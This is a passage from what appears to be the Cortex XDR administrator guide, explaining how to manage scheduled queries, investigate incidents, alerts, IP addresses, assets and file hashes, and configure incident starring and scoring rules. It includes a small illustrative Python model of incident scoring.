shortcut value must be a keyboard letter, A through Z, and cannot be the same as the shortcut defined for
the Artifact and Asset Views.
You can also prepopulate searches in Quick Launcher by selecting text in the app or selecting a node in the
Causality or Timeline Views.
By default, Cortex XDR opens the Quick Launcher in the center of the page. To change the default position,
drag the Quick Launcher to another preferred location. The next time you open the Quick Launcher, it
opens in the previous location. To close the Quick Launcher, click Esc or click out of the Quick Launcher
dialog.

Cortex XDR Scheduled Queries
From the Scheduled Queries page, you can easily view all scheduled and recurring queries created from
the Query Builder. The Scheduled Queries page displays information about the query including the query
parameters and allows you to adjust or modify the schedule as needed. To edit a query schedule, right-click
the query and select the desired action.

The following table describes the fields that are available for each query in alphabetical order.

Field Description

CREATED BY User who created or scheduled the query.

NEXT EXECUTION Next execution time if the query is scheduled to run at a specific frequency. If the
query was only scheduled to run at a specific time and date, this field shows None.

QUERY DESCRIPTION The query parameters used to run the query.

QUERY ID Unique identifier of the query.

QUERY NAME For saved queries, the Query Name identifies the query name specified by the administrator.
For scheduled queries, the Query Name identifies the auto-generated name of the parent query.
Scheduled queries also display an icon to the left of the name to indicate that the query is recurring.

SCHEDULE TIME Frequency or time at which the query was scheduled to run.

TIMESTAMP Date and time the query was created.

Manage Scheduled Queries


From the Scheduled Queries page, you can perform additional actions to manage your scheduled and
recurring queries.

• View Completed Queries
• Edit the Query Frequency
• Disable or Remove a Query
• Rename a Scheduled Query

View Completed Queries
To view completed queries:

STEP 1 | Select INVESTIGATION > Scheduled Queries.

STEP 2 | Locate the scheduled query for which you want to view previous executions.
If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right-click anywhere in the query row, select Show executed queries, and choose whether to
open the query in the same tab or a new tab.
Cortex XDR filters the queries on the Query Center and displays the results in a new window.

Edit the Query Frequency

STEP 1 | Select INVESTIGATION > Scheduled Queries.

STEP 2 | Locate the scheduled query that you want to edit.


If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right-click anywhere in the query row and then select Edit.

STEP 4 | Adjust the schedule settings as needed, and then click OK.

Disable or Remove a Query


If you no longer need a query you can temporarily disable or permanently remove it.

STEP 1 | Select INVESTIGATION > Scheduled Queries.

STEP 2 | Locate the scheduled query that you want to change.
If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right-click anywhere in the query row and then select Remove to permanently remove the
scheduled query, or Disable to temporarily stop the query from running at the scheduled time.
If you disable a query you can later return to the Scheduled Queries page and Enable it.

Rename a Scheduled Query

STEP 1 | Select INVESTIGATION > Scheduled Queries.

STEP 2 | Locate the scheduled query that you want to change.


If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right-click anywhere in the query row and then select Rename.

STEP 4 | Edit the query name as desired, and then click OK.

Research a Known Threat


This topic describes what steps you can take to investigate a lead. A lead can be:
• An alert from a non-Palo Alto Networks system with information relevant to endpoints or firewalls.
• Information from online articles or other external threat intelligence that provides well-defined
characteristics about the threat.
• Users or hosts that have been reported as acting abnormally.

STEP 1 | Use the threat intelligence you have to build a query using Cortex XDR Query Builder.
For example, if external threat intelligence indicates a confirmed threat that involves specific files or
behaviors, search for those characteristics.

STEP 2 | View the Results of a Query and refine as needed to filter out noise.
See Modify a Query.

STEP 3 | Select an event of interest, and open the Causality View.


Review the chain of execution and data, navigate through the processes on the tree, and analyze the
information.

STEP 4 | Open the Timeline View to view the sequence of events over time.

STEP 5 | Inspect the information again, and identify any characteristics you can use to Create a BIOC
Rule.
If you can create a BIOC rule, test and tune it as needed.

Investigate Incidents
An attack event can affect several users or hosts and raise different types of alerts caused by a single event.
You can track incidents, assign analysts to investigate, and document the resolution. For a record log of all
actions taken by analysts in the incident, see Monitor Administrative Activity.
Use the following steps to investigate an incident:

STEP 1 | Navigate to Investigate > Incidents.

STEP 2 | From the Incidents table, locate the incident you want to investigate.
Filter and sort your incidents. Recommended ways include:
• Prioritize incidents according to your incident scoring rules by sorting the Score field to display
incidents with the highest score first.
• In the Status field filter for New incidents to view only the incidents that have not yet been
investigated.
• In the Severity field, identify the incidents with the highest threat impact.
• In the Incident Sources field, filter according to the sources that raised the alerts which make up the
incident.
• In the timestamp fields, such as Last Updated and Creation Time, right-click to Show rows 30 days
prior or 30 days after the selected timestamp field value.
After you locate an incident you want to investigate, right-click it and select View Incident.

The Incident details page aggregates all alerts, insights, and affected assets and artifacts from those
alerts in a single location. From the Incident details page you can manage the alert and investigate an
event within the context and scope of a threat. Select the pencil icon to edit the incident name and
description.

STEP 3 | Assign an incident to an analyst.


Select the assignee (or Unassigned in the case of a new incident) below the incident description and
begin typing the analyst’s email address for automated suggestions. Users must have logged into the app
to appear in the auto-generated list.

STEP 4 | Assign an incident status.

Select the incident status to update the status from New to Under Investigation, or Resolved to
indicate which incidents have been reviewed and to filter by status in the incidents table.

STEP 5 | Review the details of the incident, such as alerts and insights related to the event, and affected
assets and artifacts.
• Investigate Key Artifacts.
Key Artifacts list files and file hashes, signers, processes, domains, and IP addresses that are related
to the threat event. Each alert type contains certain key artifacts, and the app weighs and sorts alerts
into Incidents based on the key artifacts. Different key artifacts have different weights according to
their impact and case. The app analyzes the alert type, related causality chains, and key artifacts to
determine which incident has the highest correlation with the alert, and the Cortex XDR app groups
the alert with that incident.
The app also displays any available threat intelligence for the artifact. The Threat Intelligence
column in the Key Artifacts panel lists the WildFire (WF) verdicts associated with each artifact and
identifies any malware with a red malware icon. If WildFire flips the file verdict, the hash verdict in
the Cortex XDR incident is updated immediately. If a hash is unknown to WildFire at the time of
incident creation, it remains unknown until WildFire reaches a verdict. Then, the new WildFire verdict
is updated in the incident within 24 hours. If you also integrate additional threat intelligence, this
section can also display VirusTotal (VT) scores and AutoFocus (AF) tags. For additional information,
see External Integrations.
Right-click a file or process under Key Artifacts to view the entire artifact report from the threat
intelligence source. The right-click menu lets you:
• View VirusTotal and AutoFocus reports.
• Add to Allow List. Artifacts added to the allow list are displayed with
• Add to Block List. Artifacts added to the block list are displayed with
• Open Hash View to display detailed information about the files and processes relating to the hash.
• Open IP Address View to display detailed information about the IP address.
• Investigate Key Assets.
Key Assets identify the scope of endpoints and users affected by the threat. Right-click an asset to
Filter Alerts by that asset and Open Asset View to display the host insights.
• Investigate Alerts.
Incidents are created through high or medium severity alerts. Low severity Analytics alerts sometimes
also create an incident. Low and informational severity alerts are categorized as Insights and are
available on the Insights tab. In the incident, review the alerts and, if additional context is required,
review the related insights. You can also view high, medium, and low severity alerts in the main Alerts
table.
During your investigation, you can also perform additional management of alerts, which include:
• Analyze an Alert

• View the Alert Causality
• Timeline View
• Copy Alerts
• Build an Alert Exclusion Policy from Alerts in an Incident
• Initiate a remediation analysis

STEP 6 | (Optional) Take action on the incident.


• Change the incident severity.
The default severity is based on the highest alert in the incident. To manually change the severity
select Actions > Change Incident Severity and choose the new severity. The smaller severity bubble
indicates the original severity.

• Manage the incident score.
Select Actions > Manage Incident Score to investigate how the Rule based score was calculated.
Listed are the Rule ID, Rule Name, Description, Alert IDs, and the Total Added Score associated with
the incident.
The table displays all rules that contributed to the incident total score, including rules that have been
deleted. Scores from deleted rules appear as N/A. You can override the Rule based score by selecting Set
score manually and Apply the change.
• Change the incident status.
Select Actions > Change Incident Status to update the status from New to Under Investigation.
• Create an exclusion.
Select Actions > Create Exclusion to pivot to the Create New Exclusion page.
• Merge incidents.
To merge incidents you think belong together, select Actions > Merge Incidents. Enter the target
incident ID you want to merge the incident with.
Incident scoring is managed as follows:
• Rule Based Score recalculates the incident score to include the merged incident scores.
• Manual Score allows you to enter a score and override the rule-based score.
Incident assignees are managed as follows:
• If both incidents have been assigned—Merged incident takes the target incident assignee.
• If both incidents are unassigned—Merged incident remains unassigned.
• If the target incident is assigned and the source incident is unassigned—Merged incident takes the
target assignee.
• If the target incident is unassigned and the source incident is assigned—Merged incident takes the
existing assignee.

STEP 7 | Track and share your investigation progress.


Add notes or comments to track your investigative steps and any remedial actions taken.
• Select the Incident Notepad to add and edit the incident notes. You can use notes to add code
snippets to the incident or add a general description of the threat.
• Use the comments to coordinate the investigation between analysts and track the progress of the
investigation. Select the comments to view or manage comments.
Collapse the comment threads for an overview of the discussion.
If needed, Search to find specific words or phrases in the comments.

STEP 8 | Resolve the incident.


After the incident is resolved:
1. Set the status to Resolved.
Select the status from the Incident details or select Actions > Change Incident Status.
2. Select the reason the incident was resolved.

3. Add a comment that explains the reason for closing the incident.
4. Select OK.
The Cortex XDR app no longer adds new alerts to the resolved incident and instead adds incoming
alerts to a new incident.

External Integrations
Cortex XDR supports the following integrations.

Integration Description

Threat Intelligence

WildFire® Cortex XDR automatically includes WildFire threat intelligence in incident and alert
investigation. WildFire detects known and unknown threats, such as malware. The WildFire verdict
contains detailed insights into the behavior of identified threats. The WildFire verdict displays next
to relevant Key Artifacts in the incident details page. See Review WildFire Analysis Details for more
information.

AutoFocus™ AutoFocus groups conditions and indicators related to a threat with a tag. Tags can be
user-defined or come from threat-research team publications and are divided into classes, such as
exploit, malware family, and malicious behavior. See the AutoFocus Administrator’s Guide for more
information on AutoFocus tags.
To view AutoFocus tags in Cortex XDR incidents, you must obtain the license key for the service and
add it to the Cortex XDR Configuration. When you add the service, the relevant tags display in the
incident details page under Key Artifacts.

VirusTotal VirusTotal provides aggregated results from over 70 antivirus scanners, domain services
included in the block list, and user contributions. The VirusTotal score is represented as a fraction,
where, for example, a score of 34/52 means that out of 52 queried services, 34 services determined
the artifact to be malicious.
To view VirusTotal threat intelligence in Cortex XDR incidents, you must obtain the license key for
the service and add it to the Cortex XDR Configuration. When you add the service, the relevant
VirusTotal (VT) score displays in the incident details page under Key Artifacts.

Incident Management

Cortex XSOAR Cortex XSOAR enables automated and coordinated threat response with the ability to
adjust and test response playbooks. When used with Cortex XDR, you can manage incidents from the
Cortex XSOAR interface and leverage the Cortex XDR Causality Analytics Engine and detection
capabilities. Changes to one app are reflected in the other.

Third-party ticketing systems To manage incidents from the application of your choice, you can use
the Cortex XDR API Reference to send alerts and alert details to an external receiver. After you
generate your API key and set up the API to query Cortex XDR, external apps can receive incident
updates, request additional data about incidents, and make changes such as setting the status,
changing the severity, or assigning an owner. To get started, see the Cortex XDR API Reference.

Manage Incident Starring
To help you focus on the incidents that matter most, you can star an incident. Cortex XDR identifies starred
incidents with a purple star. You can star incidents in two ways: You can manually star an incident after
reviewing it, or you can create an incident starring configuration that automatically categorizes and stars
incidents when a related alert contains the specific attributes that you decide are important. After you
define an incident starring configuration, Cortex XDR adds a star indicator to any incidents that contain
alerts that match the configuration.

You can then sort or filter the Incidents table for incidents containing starred alerts and similarly filter
the Alerts table for starred alerts. In addition, you can also choose whether to display all incidents or only
starred incidents on the Incidents Dashboard.

Star a Specific Incident


To manually star an incident during or after investigation:

STEP 1 | Select Investigation > Incidents.

STEP 2 | To open an incident, right-click the incident row and select View Incident.

STEP 3 | Click the star icon.

The star changes to a purple star. After starring the incident, it will appear in filters for starred incidents.
For example, on the Incidents page, you can sort or filter by Starred status.

Create a Starring Configuration
To proactively star alerts and incidents containing alerts, create a starring configuration.

STEP 1 | Select Investigation > Incident Management > Starred Alerts.

STEP 2 | Select + Add Starring Configuration.

STEP 3 | Enter a Configuration Name to identify your starring configuration.

STEP 4 | Enter a descriptive Comment that identifies the reason or purpose of the starring
configuration.

STEP 5 | Use the alert filters to build the match criteria for the policy.
You can also right-click a specific value in the alert to add it as match criteria. The app refreshes to show
you which alerts in the incident would be included.

STEP 6 | Create the policy and confirm the action.


If you later need to make changes, you can view, modify, or delete the starring configuration from the
Investigation > Incident Management > Starred Alerts page.

Create an Incident Scoring Rule


Cortex XDR uses stitching logic to gather and assign alerts to incidents based on a set of rules which
take into account different alert attributes, such as the SHA256 of the files that are involved and the IP
addresses. The incidents displayed in the Incidents Table can be prioritized according to these alert
attributes.

To enable you to prioritize incidents that are significant to the needs of your organization, the Incident
Scoring Rules allow you to set custom rules that highlight the incidents based on:
• A user-defined score
• Selected Cortex XDR alert attributes and assets
When an alert is triggered, Cortex XDR matches the alert with each of the custom incident rules you
created. If the alert matches one or more of the rules, the alert is given the score defined by each rule. An
incident rule can also contain a sub-rule that allows you to create a rule hierarchy. Where a sub-rule exists,
if the same alert matches one or more of the sub-rules, the alert is also given the score defined by each sub-
rule. By default, a score is applied only to the first alert that matches the defined rule and sub-rule.

A sub-rule score is only applied to an alert if the top-level rule was a match.

Within each incident, Cortex XDR aggregates the alert scores and assigns the incident a total score. The
incident score is displayed in the Incidents Table as a filterable field, Score, allowing you to prioritize the
Incidents Table according to the incident score. You can also view the score while investigating in the
Incident View.
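The following is an added example, not Cortex XDR code, that models the scoring behavior described above (rule and sub-rule matching, the Apply score only to first alert of incident option, the sub-rule gate on a matching parent rule, the per-incident total, and the manual override) together with the score and assignee handling described earlier for Merge incidents. The rule predicates, host names, hash values, and alert IDs are constructed placeholders; treating the recalculated rule-based score of a merged incident as the sum of both incidents' contributions is an assumption.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

# Constructed model of the incident scoring described in this guide; not Cortex XDR code.
Alert = Dict[str, object]


@dataclass
class ScoringRule:
    rule_id: int
    name: str
    score: int
    # Stand-in for the alert filter built in the Scoring Rules UI (assumption: any
    # predicate over alert attributes).
    matches: Callable[[Alert], bool]
    first_alert_only: bool = True       # "Apply score only to first alert of incident"
    enabled: bool = True                # disabled rules are kept but never score
    sub_rules: List["ScoringRule"] = field(default_factory=list)


@dataclass
class Incident:
    incident_id: int
    assignee: Optional[str] = None
    manual_score: Optional[int] = None  # "Set score manually" overrides the rule-based score
    alerts: List[Alert] = field(default_factory=list)
    fired: set = field(default_factory=set)   # rule IDs that already scored in this incident
    contributions: List[Tuple[int, int, int]] = field(default_factory=list)  # (rule_id, alert_id, score)


def _apply_rule(incident: Incident, alert: Alert, rule: ScoringRule) -> int:
    """Score one alert against one rule and, only if the rule matched, its sub-rules."""
    if not rule.enabled or not rule.matches(alert):
        return 0                        # a non-matching parent gates all of its sub-rules
    added = 0
    if not (rule.first_alert_only and rule.rule_id in incident.fired):
        incident.fired.add(rule.rule_id)
        incident.contributions.append((rule.rule_id, alert["alert_id"], rule.score))
        added += rule.score
    for sub in rule.sub_rules:
        added += _apply_rule(incident, alert, sub)
    return added


def add_alert(incident: Incident, alert: Alert, rules: List[ScoringRule]) -> int:
    """Attach an alert to an incident and return the score that alert contributed."""
    incident.alerts.append(alert)
    return sum(_apply_rule(incident, alert, rule) for rule in rules)


def rule_based_score(incident: Incident) -> int:
    return sum(score for _, _, score in incident.contributions)


def incident_score(incident: Incident) -> int:
    """Score shown in the Incidents table: the manual score if set, else the rule-based one."""
    return incident.manual_score if incident.manual_score is not None else rule_based_score(incident)


def merge_incidents(target: Incident, source: Incident) -> Incident:
    """Merge source into target following the scoring and assignee rules in this guide."""
    merged = Incident(incident_id=target.incident_id, manual_score=target.manual_score)
    merged.alerts = target.alerts + source.alerts
    merged.fired = target.fired | source.fired
    merged.contributions = target.contributions + source.contributions  # assumption: summed
    # Both assigned -> target's assignee; both unassigned -> none; otherwise whichever is set.
    merged.assignee = target.assignee if target.assignee is not None else source.assignee
    return merged


# Constructed sample data: hosts, hashes and IDs are placeholders.
BAD_HASHES = {"sha256-placeholder-1"}


def build_rules() -> List[ScoringRule]:
    known_bad_hash = ScoringRule(11, "Known-bad file hash", 5,
                                 lambda a: a.get("sha256") in BAD_HASHES)
    external_ip = ScoringRule(1, "Alert involves an external IP", 10,
                              lambda a: bool(a.get("external_ip")), sub_rules=[known_bad_hash])
    critical_host = ScoringRule(2, "Alert on a critical server", 20,
                                lambda a: a.get("host") == "db-prod-01", first_alert_only=False)
    return [external_ip, critical_host]


SAMPLE_ALERTS: List[Alert] = [
    {"alert_id": 1, "host": "db-prod-01", "external_ip": True, "sha256": "sha256-placeholder-1"},
    {"alert_id": 2, "host": "db-prod-01", "external_ip": True, "sha256": "sha256-placeholder-2"},
    {"alert_id": 3, "host": "ws-17", "external_ip": False, "sha256": "sha256-placeholder-1"},
    {"alert_id": 4, "host": "ws-42", "external_ip": True, "sha256": "sha256-placeholder-3"},
]

if __name__ == "__main__":
    rules = build_rules()
    incident = Incident(incident_id=100)
    for alert in SAMPLE_ALERTS[:3]:
        print("alert", alert["alert_id"], "added", add_alert(incident, alert, rules))
    # alert 1: 10 (rule 1) + 5 (sub-rule 11) + 20 (rule 2); alert 2: rule 1 already scored,
    # sub-rule does not match, rule 2 scores again; alert 3: rule 1 fails, so sub-rule 11 never runs.
    other = Incident(incident_id=101, assignee="analyst@example.test")
    add_alert(other, SAMPLE_ALERTS[3], rules)
    merged = merge_incidents(incident, other)
    print("merged score", incident_score(merged), "assignee", merged.assignee)
```

Alert 3 is the case worth noticing: its hash is on the constructed bad list, yet it earns nothing, because a sub-rule score is only applied when the top-level rule matched. Rule 2 has the first-alert option cleared, so it scores every alert on the critical host, which is why the incident keeps growing with alert 2.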
To create an incident scoring rule:

STEP 1 | In the Cortex XDR Management Console, navigate to Investigation > Incident Management >
Scoring Rules.
The Scoring Rules table displays the rules and, if applicable, the sub-rules currently in your Cortex XDR
tenant.

STEP 2 | Select Add Scoring Rule to define the rule criteria.

STEP 3 | In the Create New Scoring Rule dialog, define the following:

1. Rule Name—Enter a unique name for your rule.
2. Score—Set a numeric value that is applied to an alert matching the rule criteria.
3. Base Rule—Select whether to create a top-level rule, Root, or sub-rule, listed Rule Name (ID:#). By
default, rules are defined at root level.
4. Comment—Enter an optional comment.
5. Mark whether to Apply score only to first alert of incident—By selecting this option you choose to
apply the score only to the first alert that matches the defined rule. Subsequent alerts of the same
incident will not receive a score from this rule again. By default, a score is applied only to the first
alert that matches the defined rule and sub-rule.
6. Determine which alert attribute you want to use as the rule match criteria. Use the filter at the top of
the table to build your rule criteria.

STEP 4 | Review the rule criteria and Create the incident rule.
You are automatically redirected to the Scoring Rules table.

STEP 5 | In the Scoring Rules table, Save your scoring rule.

STEP 6 | (Optional) Manage your existing incident scoring rules.


In the Scoring Rules table view your existing rules and sub-rules.

Rearrange rules as needed, and make sure to Save after any changes you make.
• Right-click one rule or select more than one to:
• Edit rule—Edit the rule criteria for an existing rule.
• Delete rule—Remove a rule and the sub-rules from your Cortex XDR tenant.
• Disable / Enable rule—Disables or enables rule. Disabled rules appear in the table but are grayed
out and you cannot perform any actions on them.
• Copy rule—Copy the rule criteria to the clipboard to create a sub-rule. Locate the rule to which you
want to add a sub-rule, right-click it, and select Paste “rule name”.
• Add sub-rule—Add a sub-rule to an existing rule.
Make sure to Save your changes.

STEP 7 | (Optional) Investigate and manage incidents scoring rules from the Incident Table or View.

Investigate Artifacts and Assets
To streamline the investigation process and reduce the number of steps it takes to investigate and threat
hunt artifacts and assets, Cortex XDR provides dedicated views of information relating to IP address,
Network Assets, and File and Process Hash. Each of the views automatically aggregates and displays a
summary of all the information Cortex XDR and threat intelligence services have regarding a specific artifact
and asset.
• IP Address View
• Asset View
• File and Process Hash View

Investigate an IP Address
The IP Address View provides a powerful way to investigate and take action on IP addresses by
reducing the number of steps it takes to collect, research, and threat hunt related incidents. Cortex XDR
automatically aggregates and displays a summary of all the information Cortex XDR and threat intelligence
services have regarding a specific IP address over a defined 24-hour or 7-day time frame.
To help you determine whether an IP address is malicious, the IP Address View displays an interactive visual
representation of the collected activity for a specific IP address.

To investigate an IP address:

STEP 1 | Open the IP View for an IP address.


You can open the view from any IP address in the Cortex XDR console: right-click the IP address and
select Open IP View, select the IP address and press the default keyboard shortcut Ctrl/CMD+Shift+E,
or search for a specific IP address in the Quick Launcher.

To change the default keyboard shortcut, navigate to Settings > General > Keyboard Shortcuts.
The shortcut value must be a keyboard letter, A through Z, and cannot be the same as the Quick
Launcher defined shortcut.

STEP 2 | Review the overview for the IP address.


The overview displays network operations, incidents, actions, and threat intelligence information relating
to a specific IP address and provides a summary of the network operations and processes related to the
IP address.
1. Review the auto-generated summary of the number of network operations and processes related to
the IP address that occurred over the past 7 days.
2. Add an Alias or Comment to the IP address.
3. Review the location of the IP address.
• External—IP address is located outside of your organization. Displays the country flag if the
location information is available.
• Internal—IP address is from within your organization. The XDR Agent icon is displayed if the
endpoint identified by the IP address had an agent installed at that point in time.
4. Identify the IOC severity.
The color of the IP address value is color-coded to indicate the IOC severity.
• Low—Blue
• Medium—Yellow
• High—Red
5. Review any available threat intelligence for the IP address.
Depending on the threat intelligence sources that you integrate with Cortex XDR, you can review any
of the following threat intelligence.
• VirusTotal score and report

Requires a license key. Navigate to Settings > Integrations > Threat
Intelligence.
• Whois identification data for the specific IP address.
• IOC Rule, if applicable, including the IOC Severity, Number of hits, and Source.
• EDL IP address if the IP address was added to an EDL.
6. Review any related incidents:
Related Incidents lists the most recent incidents that contain the specific IP address as part of the
incident Key Artifacts according to the Last Updated timestamp. If the IP address belongs to an
endpoint with a Cortex XDR agent installed, the incidents are displayed according to the host name
rather than the IP address. To dive deeper into specific incidents, select the Incident ID. To view all
the related incidents, select View All. Cortex XDR displays Recently Updated Incidents which filters
incidents for those that contain the IP address.

STEP 3 | Filter the IP address information you want to visualize.


Select from the following criteria to refine the scope of your IP address information you want visualized.
Each selection aggregates the displayed data.

Filter Description

Type The type of information you want to display.
• Host Insights—Pivot to the Asset View of the host associated with the IP address.
• Network Connections—Display the IP View of the network connections made with the IP address.

Primary The main set of values you want to display. The values depend on the selected Connection Type.
• All Aggregations—Summary of all the related IP address data.
• Destination/Source Country
• Destination/Source Port
• Destination/Source IP
• Destination/Source Process
• App-ID

Secondary The set of values you want to apply as the secondary set of aggregations. Must differ from
your Primary selection:
• Destination Country
• Destination/Source Port
• Destination/Source IP
• Destination/Source Process
• App-ID

Node Size The node size to display for the type of values.
• Number of Connections
• Total Traffic
• Total Download
• Total Upload

Showing The number of Primary and Secondary aggregated connections to display.
• Top 5
• Top 3
• Bottom 5
• Bottom 3

Connection Type The type of connection for which to display your defined set of values.
• Incoming
• Outgoing

Timeframe The time period over which to display your defined set of values.
• 24 Hours
• 7 Days

Apply your selections to update the information displayed in the visualization pane. If
necessary, Refresh to retrieve data.

STEP 4 | Review the selected data.


• Select each node to view additional information.
• Select Recent Outgoing Connections to view the most recent connections made by this IP address.
Search all Outgoing Connections to run a Network Connections query on all the connections
made by this IP address.

STEP 5 | After reviewing the available information for the IP address, take action if desired:
Depending on the current IOC and EDL status, select Actions to:
• Edit Rule
• Disable Rule
• Delete Rule
• Add to EDL

Investigate an Asset
The Asset View provides a powerful way to investigate assets by reducing the number of steps it takes to
collect and research hosts. Cortex XDR automatically aggregates information on hosts and displays the host
insights and a list of related incidents.

To investigate an asset:

STEP 1 | Open the Asset View for an asset.


You can access the view from:
• A host with a Cortex XDR agent installed, in the Cortex XDR console, by right-clicking the host and selecting Open Asset View.
• The IP View of an internal IP address with a Cortex XDR Agent by selecting Host Insights from the
navigation bar.
• The Quick Launcher, by searching for a specific Host Name.

STEP 2 | Review the Asset overview.
The overview displays the host name and any related incidents.
1. Review the Host name.
2. Add an Alias or Comment to the host name.
3. Review any related incidents:
Related Incidents lists the most recent incidents that contain the host as part of the incident Key
Artifacts according to the Last Updated timestamp. If the host belongs to an endpoint with a Cortex
XDR agent installed, the incidents are displayed according to the host name. To dive deeper into
specific incidents, select the Incident ID. To view all the related incidents, select View All.

STEP 3 | Filter the host information you want to display.
Select from the following criteria to refine the scope of the host information you want to display. Each selection aggregates the displayed data.

Filter Description

Type The type of information you want to display.
• Host Insights—A list of the host artifacts.
• Network Connections—Pivot to the IP view of the IP addresses associated with the host.

Primary List of host artifacts you want to display.
• Users
• Groups
• Users to Groups
• Services
• Drivers
• Autorun
• System Information
• Shares
• Disks

Compare Compare host insights collected by Cortex XDR over the last 30 days.

Select to apply your selections and update the information displayed in the visualization pane.

STEP 4 | Review the Host Inventory.
Select Run insights collection to initiate a new collection. The next time the Cortex XDR agent connects, the insights are collected and displayed.

Investigate a File and Process Hash
The file and process Hash View provides a powerful way to investigate and take action on files and processes identified by SHA256 hash, by reducing the number of steps it takes to collect, research, and threat hunt related incidents. The Hash View automatically aggregates and displays a summary of all the information Cortex

XDR and threat intelligence services have regarding a specific SHA256 hash over a defined 24 hour or 7 day
time frame.
The Hash View allows you to drill down on each of the process executions, file operations, incidents,
actions, and threat intelligence reports relating to the hash.

To investigate a file or process hash:

STEP 1 | Open the Hash View for a file or process hash.
You can access the view from any hash value in the Cortex XDR console by right-click > Open Hash View, by selecting the hash and pressing the keyboard shortcut Ctrl/CMD+Shift+E, or by searching for a specific hash in the Quick Launcher.

To change the default keyboard shortcut, navigate to Settings > General > Keyboard Shortcuts. The shortcut value must be a single letter, A through Z, and cannot be the same as the shortcut defined for the Quick Launcher.

STEP 2 | Review the overview for the hash.
The overview displays host/user, incidents, actions, and threat intelligence information relating to a specific hash and provides a summary of the files and processes related to the hash.
1. Review the auto-generated summary of the number of network operations and processes related to the hash that occurred over the past 7 days.
2. Review the signature of the hash, if available.
3. Identify the WildFire verdict.
The hash value is color-coded to indicate the WildFire report verdict:
• Blue—Benign
• Yellow—Grayware
• Red—Malware
• Light gray—Unknown verdict
• Dark gray—The verdict is inconclusive

4. Add an Alias or Comment to the hash value.
5. Review any available threat intelligence for the hash.
Depending on the threat intelligence sources that you integrate with Cortex XDR, you can review any
of the following threat intelligence.
• VirusTotal score and report. Requires a license key, which you configure under Settings > Integrations > Threat Intelligence.
• AutoFocus identification data for the specific hash.
• IOC Rule, if applicable, including the IOC Severity, Number of hits, and Source according to the
color-coded values:
• Low—Blue
• Medium—Yellow
• High—Red
• WildFire analysis report.
6. Review whether the hash has been added to the Allow List or Block List, or has been quarantined. For quarantined files, select the number of endpoints to open the Quarantine Details view.
7. Review any related incidents:
Related Incidents lists the most recent incidents that contain the specific hash as part of the incident
Key Artifacts according to the Last Updated timestamp. To dive deeper into specific incidents, select
the Incident ID. To view all the related incidents, select View All. Cortex XDR displays Recently
Updated Incidents which filters incidents for those that contain the hash.

STEP 3 | Filter the hash information you want to visualize.
Select from the following criteria to refine the scope of the hash information you want visualized. Each selection aggregates the displayed data.

Filter Description

Event Type The main set of values you want to display. The
values depend on the selected type of process or
file.
• All Aggregations—Summary of all the related
hash data.
• Process Executions
• Process Injections
• File Read
• File Write
• File Delete
• File Rename
• File Create

Primary The set of values you want to apply as the primary set of aggregations. Values depend on the selected Event Type.
• Initiating Process

• Target Process / File

Secondary The set of values you want to apply as the secondary set of aggregations.
• Host
• User

Showing The number of Primary and Secondary aggregated values to display.
• Top 5
• Top 3
• Bottom 5
• Bottom 3

Timeframe Time period over which to display your defined set of values.
• 24 Hours
• 7 Days

Select to apply your selections and update the information displayed in the visualization pane. If
necessary, Refresh to retrieve data.

STEP 4 | Review the selected data. For more information, select Recent Process Executions to view the most recent executions of the process with this hash, or Search all Process Executions to run a query on the hash.

STEP 5 | After reviewing the available information for the hash, take action if desired:
• Select File Search to initiate a search for this hash across your network.
• Depending on the current hash status, select Actions to:
• Add the hash to an Allow List.
• Add the hash to a Block List.
• Create an IOC rule.

Investigate Alerts
• Cortex XDR Alerts
• Triage Alerts
• Manage Alerts
• Alert Exclusions
• Causality View
• Network Causality View
• Timeline View
• Analytics Alert View

Cortex XDR Alerts
The Alerts page displays a table of all alerts in Cortex XDR.

The Alerts page consolidates non-informational alerts from your detection sources to enable you to efficiently and effectively triage the events you see each day. By analyzing the alert, you can better understand the cause of what happened and the full story with context to validate whether an alert requires additional action. Cortex XDR supports saving 2M alerts per 4000 agents or 20 terabytes; half of the alerts are allocated for informational alerts, and half for severity alerts.
To view detailed information for an alert, open it in the Causality View or Timeline View. From these views you can also view related informational alerts that are not presented on the Alerts page.
By default, the Alerts page displays the alerts that it received over the last seven days (to modify the time period, use the page filters). Every 12 hours, Cortex XDR enforces a cleanup policy to remove the oldest alerts that exceed the maximum alerts limit.
The following table describes both the default fields and additional optional fields that you can add to the alerts table using the column manager, and lists the fields in alphabetical order.

Field Description

Status Indicator Identifies whether there is enough endpoint data to analyze an alert.

Check box Select one or more alerts on which to perform actions. Select multiple alerts to assign all

selected alerts to an analyst, or to change the status
or severity of all selected alerts.

ACTION Action taken by the alert sensor, either Detected or Prevented, with the action status displayed in parentheses. Options are:
• Detected
• Detected (Allowed The Session)
• Detected (Download)
• Detected (Forward)
• Detected (Post Detected)
• Detected (Prompt Allow)
• Detected (Raised An Alert)
• Detected (Reported)
• Detected (Scanned)
• Detected (Sinkhole)
• Detected (Syncookie Sent)
• Detected (Wildfire Upload Failure)
• Detected (Wildfire Upload Success)
• Detected (Wildfire Upload Skip)
• Detected (XDR Managed Threat Hunting)
• Prevented (Block)
• Prevented (Blocked)
• Prevented (Block-Override)
• Prevented (Blocked The URL)
• Prevented (Blocked The IP)
• Prevented (Continue)
• Prevented (Denied The Session)
• Prevented (Dropped All Packets)
• Prevented (Dropped The Session)
• Prevented (Dropped The Session And Sent a TCP
Reset)
• Prevented (Dropped The Packet)
• Prevented (Override)
• Prevented (Override-Lockout)
• Prevented (Post Detected)
• Prevented (Prompt Block)
• Prevented (Random-Drop)
• Prevented (Silently Dropped The Session With
An ICMP Unreachable Message To The Host Or
Application)
• Prevented (Terminated The Session And Sent a
TCP Reset To Both Sides Of The Connection)
• Prevented (Terminated The Session And Sent a
TCP Reset To The Client)
• Prevented (Terminated The Session And Sent a
TCP Reset To The Server)
• N/A


AGENT OS SUB TYPE The operating system subtype of the agent from
which the alert was triggered.

ALERT ID A unique identifier that Cortex XDR assigns to each alert.

ALERT NAME Module that triggered the alert. If the alert was generated by Cortex XDR, the Alert Name is the specific Cortex XDR rule that created the alert (BIOC or IOC rule name). If it came from an external system, it carries the name assigned to it by Cortex XDR. Alerts that match an alert starring policy also display a purple star.

For alerts coming from firewalls, if duplicate alerts with the same name and host are raised within 24 hours, they are aggregated and identified by a +n tag.

